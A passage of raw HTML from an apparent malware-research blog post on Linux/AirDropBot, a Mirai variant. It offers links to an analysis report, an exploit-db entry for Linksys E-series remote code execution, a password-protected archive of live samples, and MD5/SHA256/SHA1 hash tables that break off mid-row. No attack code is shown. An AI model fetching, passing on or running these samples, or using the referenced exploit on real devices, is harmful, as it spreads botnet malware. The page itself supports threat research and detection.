<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">34f915ac414e9aad2859217169f9a3aa</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">2f9cd1d07c535aae41d5eed1f8851855b95b5b38fb6fe139b5f1ce43ed22df22</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">d66f1e47c983a8d30ad7fd30cd08db8cd29a92b0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">59e08f2ce1c3e55e2493baf36c1ad3c6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">327f24121d25ca818cf8414c1cc704c3004ae63a65a9128e283d64be03cdd42e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">90d45b81e9a97ddcc9911122f4e8fd439ccc8fa9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f4bc173bf80d922da4e755896af0db61</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">37b2b33a8e344efcaca0abe56c6163ae64026ccef65278b232a9170ada1972af</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">fab32f8c3ce3a837e80a1d98ada41a5bf39b01e7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">a253273e922ce93e2746a9791798e3fe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">3a595e7cc8e32071781e36bbbb680d8578ea307404ec07e3a78a030574da8f96</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">99cfdec405f6a9f43d58b1856fce7ca3445395d3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">335e322c56278e258e4d7b5e17ad98e6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">4313af898c5e15a68616f8c40e8c7408f39e0996a9e4cc3e22e27e7aeb2f8d54</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">504022707609a0fec9cbb21005cb0875be2a4726</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">93522e5f361a051f568bd1d74d901d30</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">46ea20e3cf34d1d4cdfd797632c47396d9bdc568a75d550d208b91caa7d43a9b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e7fc96b2a92888572de2539f227c9a6625449f83</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c86af536d87c1e5745e7d8c9f44fd25d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">4b0feb1dd459ade96297b361c69690ff69e97ca6ee5710c3dc6a030261ba69e0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6ef69a683913ae650634aedc40af8d595c45cb4f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">90c7c5e257c95047dbf52bbfbe011fd6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">4db9924decd3e578a6b7ed7476e499f8ed792202499b360204d6f5b807f881b8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1c3a9be6ae9300aaad00fb87d5407ed6e84ec80b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">7c0528e54b086e5455ef92218ea23d03</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5e6896b39c57d9609dc1285929b746b06e070886809692a4ac37f9e1b53b250c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">868abc912ff2fdcd733ff1da87e48e7d4c288a73</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6405b42d2c7e42244ac73695bb7bfe6b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">64f03fff3ed6206337332a05ab9a84282f85a105432a3792e20711b920124707</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">173aca65181c8da84e062c803a43a404ad49302d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6441157813de77d9849da5db9987d0bb</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6b2885a4f8c9d84e5dc49830abf7b1edbf1b458d8b9d2bafb680370106f93bc3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">92dff9bdb31d3b9480d9e5f72a307715859dd094</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">614ea66b907314398cc14b3d2fdebe79</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6b29b65c3886b6734df788cfc6628fbee4ce8921e3c0e8fc017e4dea2da0fd0b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c7e71c42d391f9c69375505dbf3767ba967f9103</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">00fe3120a666a85b84500ded1af8fb61</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">885dce73237c4d7b4d481460baffbd5694ab671197e8c285d53b551f893d6c09</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">342ed67e08d16ab982a4012fcecdca060a5da46b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5477de039f7838dea20d3be1ae249fcb</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">886136558ec806da5e70369ee22631bfb7fa06c27d16c987b6f6680423bc84b0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5b19202b45e5a58cadec8c2efa40fd924b64177d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">91bf10249c5d98ea6ae11f17b6ef0970</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8f57ec9dfba8cf181a723a6ac2f5a7f50b4550dd33a34637cf0f302c43fd0243</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">682dab9ec3ff0b629cce4e16c9c74171dd2551d4</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">fb0a7e12d2861e8512a38a6cdef3ddf0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9351ee0364bdbb5b2ff7825699e1b1ee319b600ea0726fd9bb56d0bd6c6670cb</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c077c490bb22df9886475dc5bedfc6c032061024</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9b7f5a1228fa66cbd35e75fb774fdc8e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9c7a5239601a361b67b1aa3f19b462fd894402846f635550a1d63bee75eab0a2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">ae89bc6c5cc1818b3136a40961462327c3dececc</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5b97d54dc5001eb7cf238292405070a6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">a010bf82e2c32cba896e04ec8dbff58e32eee9391f6986ab22c612165dad36a0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">96d2194f5f3927de75605f6ca6110fe683383a01</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">642f523bb46c2e901416047dca1c5d4e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">ad65c9937a376d9a53168e197d142eb27f04409432c387920c2ecfd7a0b941c8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">bbf667213a446bc9bc4a5a2e54e7391752e3a9b8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c617655312c573ecb01d292b320fff2e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">aeb480cf01696b7563580b77605558f9474c34d323b05e5e47bf43ff16b67d6a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">de102a6f35e08f18aa0c58358f5b22871eb0a45f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c8835a3d385162ae02bd4cb6c5ebac87</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">b113ec41cc2fd9be9ac712410b9fd3854d7d5ad2dcaac33af2701102382d5815</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">831eb9cf0dcd57a879c04830e54a3b85fe5d6229</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1497740fa8920e4af6aa981a5b405937</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">b13014435108b34bb7cbcef75c4ef00429b440a2adf22976c31a1645af531252</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8d6b90f0b88b1ad5dcc87d377e6a82dc6ac64211</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5e925e315ff7a69c2f2cf1556423d5af</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">b3d0d0e2144bd1ddd27843ef65a2fce382f6d590a8fee286fda49f8074711545</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">64fe900b3a2b030c28211404afa45703c6869dea</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">951ec487fb3fece58234677d7fe3e4dc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">bdefa773e3f09cdc409f03a09a3982f917a0cc656b306f0ece3dd1a2564a8772</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0b03d9471522590530dd90ad30b2d235ec98b578</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">3e84998197fc25cbac57870e3cdeb2de</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c03b403d5de9778a2ec5949d869281f13976c2fc5b071e0f5f54277680c80902</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0b9eb6d931dc6b226a913e89bb422f58228de0d0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c3a73d24df62057e299b6af183889e6b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">cb2382b818993ef6b8c738618cc74a39ecab243302e13fdddb02943d5ba79483</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6a683ef6f7653e5ee64969cbbbe4403601ae9ded</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">d428f50a0f8cd57b0d8fe818ace6af20</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">ce61dcfc3419ddef25e61b6d30da643a1213aa725d579221f7c2edef40ca2db3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9bd832256b94e43546dfb77532f6d70fcd1ce874</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e1d6d4564b35bb19d2b85ca620d7b8f2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">d0bda184dfa31018fe999dfd9e1f99ca0ef502296c2cccf454dde30e5d3a9df9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c1af00d3263893b5d23dbf38015fe3c6a92cefaf</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e9502ae7b0048b9ea25dd7537818904c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e7d6b3e1fba8cdf2f490031e8eb24cd515a30808cdd4aa15c2a41aa0016f8082</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0e080ac0130ab3f7265df01b8397e4abd13c38cb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8eb34e1fb7dd9d9f0e1fef2803812759</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">eb54dc959b3cc03fbd285cef9300c3cd2b7fe86b4adeb5ca7b098f90abb55b8a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5310a99f0f8c92bfa2f8da87e60c645f2cae305a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">ca0fc25ce066498031dc4ca3f72de4b8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f23fecbb7386a2aa096819d857a48b853095a86c011d454da1fb8e862f2b4583</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">7f4d97eea294fc567b058b09cc915be56c2a80e1</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5a2fcfff8d6aab9a0abe9ca97f6093ed</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f6af2fa4f987df773d37d9bb44841a720817ce3817dbf1e983650b5af9295a16</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f4ddf49fbf23edb23f50be62637a4a688e352057</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">ed98e8fa385b39ca274e0de17b1007e6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f7a737cb73802d54f7758afe4f9d0a7d2ea7fda4240904c0a79abae732605729</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">a69d4c2b88bfe3a06245f8fbfb8abe5e9a894cec</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">320db5f1230fcfe0672c8515eb9ddcfc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f7cf1e0d7756d1874630d0d697c3b0f3df0632500cff1845b6308b11059deb07</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8d40dbf34a02dd43a81e5cdc58a0b11bfa9f5663</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">18d6af9211d0477f9251cf9524f898f3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">f97848514b63e9d655a5d554e62f9e102eb477c5767638eeec9efd5c6ad443d8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">b0e76be186fd609d5a8a33d59d16ffa3bdab1573</td></tr>
</tbody></table>
<div style="text-align: center;">
<br /></div>
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-30857543399193168492019-10-06T16:37:00.004-04:002023-01-22T01:00:48.462-05:00Linux/AirDropBot samples<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="post-body entry-content" style="background-color: white; line-height: 1.4; position: relative; width: 810px;">
<div dir="ltr" trbidi="on">
</div>
<div dir="ltr" trbidi="on"><br />
<span style="font-family: inherit;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div dir="ltr" trbidi="on">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4thO3H_zdMvG7lH4L0uSk6Y0KKv3TclXVKniqbb1f5XfhJClQfAf6r2sQcrMo6Xgoea3LBG7Yrs-D3y6RLqt7Pm8uQg-Q4wHrUnWy__mescGgcVl87Aaf9fCUpRUJbfSmssizTMpxDX4/s1600/10590344_0+%25282%2529.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" data-original-height="1000" data-original-width="1000" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4thO3H_zdMvG7lH4L0uSk6Y0KKv3TclXVKniqbb1f5XfhJClQfAf6r2sQcrMo6Xgoea3LBG7Yrs-D3y6RLqt7Pm8uQg-Q4wHrUnWy__mescGgcVl87Aaf9fCUpRUJbfSmssizTMpxDX4/w249-h249/10590344_0+%25282%2529.jpg" width="249" /></span></a><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><br /></span></span></span></span>
<span style="font-family: inherit;">Malware Must Die: </span><a href="http://contagio.deependresearch.org/read/Crime_2019_MMD-0064-2019+-+Linux_AirDropBot.pdf">MMD-0064-2019 - Linux/AirDropBot</a></div>
<div dir="ltr" trbidi="on">
<span style="font-family: inherit;"><br />
</span></div>
<div dir="ltr" trbidi="on">
<a href="https://www.exploit-db.com/exploits/31683"><span style="font-family: inherit;"><span style="font-family: inherit;">Mirai variant targeting </span>Linksys E-series - Remote Code Execution</span></a></div>
<div dir="ltr" trbidi="on">
<a href="http://contagio.deependresearch.org/read/Crime_2014_Linksys+E-series+-Remote+Code+Execution.pdf"><span style="font-family: inherit;">tmUnblock.cgi </span></a></div>
<div dir="ltr" trbidi="on">
<span style="font-family: inherit;"><br />
</span></div>
<div dir="ltr" trbidi="on"><a href="https://s3.amazonaws.com/contagio.deependresearch.org/APT/Russia/Solarwinds_Solaburst_Nobelium_samples.zip" style="font-family: verdana;" target="_blank"><span style="font-family: verdana;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></span></a><a href="http://contagio.deependresearch.org/crime/Linux_Airdropbot_mirai_samp.zip">Download. Email me if you need the password (see in my profile)</a></div>
<div dir="ltr" trbidi="on">
<span style="font-family: inherit;"><br />
</span></div>
<div dir="ltr" trbidi="on"> <a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000; font-family: verdana; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a></div><div dir="ltr" trbidi="on"><br /></div><div dir="ltr" trbidi="on"><br /></div><span><a name='more'></a></span><div dir="ltr" trbidi="on"><div dir="ltr" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 19, 2023</span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"></a></div><div dir="ltr" trbidi="on"><br /></div></span></div></div><div dir="ltr" trbidi="on"><div style="line-height: 19.6px;"><div style="line-height: 19px;">
<div>
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<b><span style="font-family: inherit;">Hashes</span></b></div>
<div style="line-height: 19.6px;">
<div style="line-height: 19px;">
<div>
<span style="font-family: inherit;"><br />
</span></div>
<div>
<div class="samplearea" style="border: 0px; color: #1c1c1c; font-stretch: inherit; line-height: inherit; margin: 0px 0px 2em; padding: 0px; text-align: center; vertical-align: baseline;">
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); margin: 0px auto; text-align: center;"><thead>
<tr class="tableizer-firstrow"><th style="background-color: #45682e; color: white; text-align: left;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">MD5</span></div>
</th><th style="background-color: #45682e; color: white; text-align: left;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">SHA256</span></div>
</th><th style="background-color: #45682e; color: white; text-align: left;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">SHA1</span></div>
</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">85a8aad8d938c44c3f3f51089a60ec16</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">1a75642976449d37acd14b19f67ed7d69499c41aa6304e78c7b2d977e0910e37</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">2f0079bb42d5088f1fec341cb68f15cdd447ac43</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">2c0afe7b13cdd642336ccc7b3e952d8d</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">64c0e594d4926a293a1f1771187db8cfb44a0dda80d8b25b4f0c975e1e77745c</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">fef65085a92654cbcf1e3e0d851c6cda8dd3b03d</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">94b8337a2d217286775bcc36d9c862d2</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">71c02b99046c3be12e31577aa6623ce47dfb7f369e67af564d2bd499080c03b6</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">d5deeb1b61026479acb421583b7b82d09d63e921</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">417151777eaaccfc62f778d33fd183ff</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">bf6941e644a430fef43afc749479859665a57b711d5483c2c7072049c7db17b7</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">f76b9447db23229edae17a3160e04df41bc35a9d</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">d31f047c125deb4c2f879d88b083b9d5</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">2785845c97a69e15c9c1535216732a9d24bcf8f7244ce7872a2b0d2d4bcb92c3</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">4693505ef4c029112c4b85a16762cf90f0d69c15</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">ff1eb225f31e5c29dde47c147f40627e</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">f7ab3d315961d84da43f30a186136a56f5aa1e9afe6b56a0d357accd5f0ab81a</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">d5f2a976b703b5e687ffc58c408e0bc880838ae7</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">f3aed39202b51afdd1354adc8362d6bf</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">fa2bc8d988c8dfbdc965f1373bd80e9f5862868397c1bcb5e84b1e9c1756e0e2</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">31f0bca917cfbffcc126219439d38fe80d5c8460</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">083a5f463cb84f7ae8868cb2eb6a22eb</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">d654850f7785a5adb34f0808e2952f66e3784c0a32427fab9e97c75f0a48d9f5</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">ed4359a2805ce69771253d2257598b5c63c36c8e</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">9ce4decd27c303a44ab2e187625934f3</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">a2a245f12ae44cca79f03a465e2dc3dfa222dfcfda1017824b16abf397f16255</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">710e85ae3d362d3c8f3759319c308ff9b4dcdc86</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">b6c6c1b2e89de81db8633144f4cb4b7d</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">2480be0d00193250bc9eb50b35403399ed44f53d5d919600ee5bab14ef769530</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">ee77141054ac8d2fad062bcd79832b5f481c7dfb</span></div>
</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
<span style="font-family: inherit; font-size: x-small;">abd5008522f69cca92f8eefeb5f160e2</span></div>
</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><div style="text-align: center;">
